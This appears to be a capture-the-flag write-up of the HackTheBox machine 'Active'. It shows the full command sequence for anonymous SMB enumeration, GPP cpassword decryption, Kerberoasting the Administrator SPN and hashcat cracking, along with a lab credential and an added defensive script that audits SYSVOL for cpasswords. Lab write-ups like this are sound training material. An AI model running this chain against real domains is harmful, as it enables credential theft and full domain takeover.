Myles Nieman

Active

Overview

Active is an easy Windows box built around a classic Active Directory misconfiguration chain. An anonymously readable Replication share exposes a Group Policy Preferences (GPP) Groups.xml containing an encrypted cpassword, whose static AES key Microsoft itself famously published. Decrypting it yields credentials for the SVC_TGS service account. From there, that account can Kerberoast the Administrator SPN, and the resulting ticket cracks against rockyou.txt for a full domain compromise.

Path: anonymous SMB → GPP cpassword → SVC_TGS → Kerberoast Administrator → root.

Enumeration

A full TCP scan shows the tell-tale fingerprint of a domain controller — DNS, Kerberos, LDAP, SMB, and the AD web services port — on Windows Server 2008 R2.

$ nmap -A -T4 -p- 10.10.10.100
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
389/tcp   open  ldap          Microsoft Windows AD LDAP (Domain: active.htb)
445/tcp   open  microsoft-ds
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: active.htb)
Service Info: Host: DC; OS: Windows

Nmap confirms a Windows domain controller for active.htb.

The scan hands us the domain — active.htb — so I added it to /etc/hosts and moved on to SMB.

Foothold — Group Policy Preferences

Anonymous SMB enumeration lists the shares, and the non-default Replication share stands out:

$ smbclient -L //active.htb/ -N
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk

Users denies anonymous access, but Replication is wide open — and it mirrors SYSVOL, so it holds the domain’s Group Policy tree. Digging through the policies, the interesting file is the GPP Groups.xml:

active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

Browsing the Replication share to the GPP Groups.xml

That file contains a cpassword attribute. GPP passwords are AES-256 encrypted, but Microsoft published the static key back in MS14-025, so anything in a cpassword is trivially reversible. I used gpp-decrypt:

$ python3 gpp-decrypt.py -f Groups.xml

gpp-decrypt recovers the SVC_TGS credentials

That gives us working domain credentials:

active.htb\SVC_TGS : GPPstillStandingStrong2k18
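The defender's counterpart to the file above, as an added example that is not part of the original writeup: a small Python audit that walks a copy of SYSVOL (or the Replication share) and reports every GPP preferences file that still carries a cpassword, so stale credentials can be found and removed before anyone decrypts them. The sample Groups.xml is constructed and its cpassword value is a placeholder, not a real blob.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword; the element names differ per file.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes that name the account a cpassword belongs to, depending on the file type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")

def find_cpasswords(xml_text, path="<string>"):
    """Return one finding per element that carries a non-empty cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.attrib.get("cpassword")
        if not cpw:  # attribute absent, or already blanked out during cleanup
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
        findings.append({"file": path, "element": elem.tag,
                         "account": account, "cpassword_len": len(cpw)})
    return findings

def audit_tree(root):
    """Walk a SYSVOL-like tree (e.g. a copy of the Replication share) and audit each GPP file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:  # GPP XML is often BOM-prefixed
                    findings.extend(find_cpasswords(fh.read(), full))
    return findings

# Constructed sample in the shape of the Groups.xml found on the Replication share;
# the cpassword value is a placeholder, not a real blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" image="2">
    <Properties action="U" cpassword="PLACEHOLDER-BASE64-BLOB" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

def demo():
    # Recreate the Policies/<GPO GUID>/MACHINE/Preferences/Groups layout and audit it.
    with tempfile.TemporaryDirectory() as tmp:
        gpo = os.path.join(tmp, "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                           "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return audit_tree(tmp)
```

Point audit_tree at a mounted SYSVOL and any non-empty result is a credential that should be rotated and the cpassword removed from the policy.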

User

Before Kerberos would cooperate I had to fix the clock skew against the DC (Kerberos rejects tickets when the client clock drifts too far):

$ sudo systemctl stop systemd-timesyncd.service
$ sudo rdate -n active.htb

Syncing the clock to the DC so Kerberos auth succeeds

With auth working, the SVC_TGS account can read the Users share, where the user flag sits on the service account’s desktop:

$ smbclient -U "active.htb\SVC_TGS" //active.htb/Users
smb: \> get "SVC_TGS\Desktop\user.txt"

Privilege Escalation — Kerberoasting

There’s no WinRM and wmiexec didn’t land, so rather than chase a shell I went straight for Kerberoasting. Any authenticated account can request a service ticket for any SPN, and the ticket is encrypted with the service account’s NTLM hash — so a weak service-account password can be cracked offline. GetUserSPNs.py shows the Administrator account itself has an SPN registered:

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
ServicePrincipalName  Name           MemberOf
--------------------  -------------  --------
active/CIFS:445       Administrator

GetUserSPNs reveals the Administrator SPN

Requesting the ticket and cracking it against rockyou.txt recovers the Administrator password almost instantly:

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
$ hashcat -m 13100 admin.hash /usr/share/wordlists/rockyou.txt

Root

Since the goal is just the flag, there’s no need for a full shell — the recovered Administrator credentials read the flag straight off SMB:

$ smbclient -U "active.htb\Administrator" //active.htb/Users
smb: \> get "Administrator\Desktop\root.txt"

Domain admin, no shell required.

Takeaways

  • GPP cpassword is game over. Any Groups.xml with a cpassword in a readable SYSVOL/Replication share is a free credential — the encryption key is public.
  • Kerberoasting an account with an SPN turns one weak domain credential into another; here the Administrator account itself was roastable, collapsing the whole path into two steps.